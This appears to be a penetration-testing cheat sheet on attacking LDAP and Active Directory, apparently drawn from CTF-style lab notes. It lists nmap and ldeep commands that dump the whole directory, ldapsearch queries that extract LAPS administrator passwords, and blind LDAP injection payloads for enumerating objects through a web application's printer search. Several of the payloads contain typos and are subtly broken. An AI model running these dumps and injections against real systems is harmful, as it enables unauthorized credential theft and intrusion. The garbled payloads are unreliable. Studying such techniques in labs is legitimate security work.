LDAP Enumeration - Ports 389,636,3268,3269

LDAP - Port 389 or LDAP SSL on Port 636

Nmap Scan 
map -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10
nmap -sC -Pn -p389,636,3268,3269 10.10.10.10

#DUMP Everything from LDAP - Anonymous
ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump

#Dump as an Authenticated User
ldeep ldap -u Administrator -p 'password' -d steins.local -s ldap://10.0.0.1 all dump

Basic LDAP Search Commands

#Get FULL Domain Name and it's contexts
ldapsearch -x -h 10.10.10.10 -s base namingcontexts 
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts

#Dump accessible data from ldap
ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt

#Dumping passwords using LDAP:
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd

#Find the Domain Name of the DC

#Find some info or creds
ldapsearch -LLL -x -H ldap://DOMAIN.FQDN.COM -b '' -s base '(objectclass=*)'

JXplorer can be used to acess ldap service 

In the url or the response body, see if you can find "objectClass" - then its most probably using ldap

BLIND LDAP Injection - Web Application 

# Web App allows us to list all available printers from LDAP without any errors, below search filter is used
(&(objectclass=printer)(type=Canon*))

if we inject ,,*)(objectless=*))(&(objectClass=void", then the web application will issue the following query:
(&(objectclass=*)(objectClass=*))(&(objectClass=void)(type=Canon*))

in that case, only tyhe LDAP query will be processed resulting in (&(objectClass=*)(ObjectClass=*)) being extracted from blank field. 

 As a result, the printer icon will be shown to the client. As this query always returns results due to objectClass being set to a wildcard. We can construct further true/false statements in the following way : 
(&(objectClass=*)(object Class=users))(&object Class=foo)(type=Canon*))(&(objectClass=*)(objectClass=resources))(&object Class=foo)(type=Canon*)) 

Using such queries, it is possible to enumerate possible object classes based on true/false conditio (printer icon should be shown or not).

Similar logic can be used in case of "OR" blind LDAP injection. Consider the following query with injected part:

#query returns no object, so the printer icon should not be shown to the user.
(|(objectClass=void)(objectClass=void))(&objectClass=void)(type=Canon*)) 

#Enumerate Directory Structure
(|(objectClass=void)(objectClass=users))(&objectClass=void) (type=Canon*)) 
(|(objectClass=void)(object Class=resources))(&objectClass=void) (type=Canon*)) # List Local Users accounts

?objectClass=posixAccount

you can find ldap schema's here

# posixaccount Account contains below attributes
uidNumber
gidNumber
homedirectory
userpassword
sshPublicKey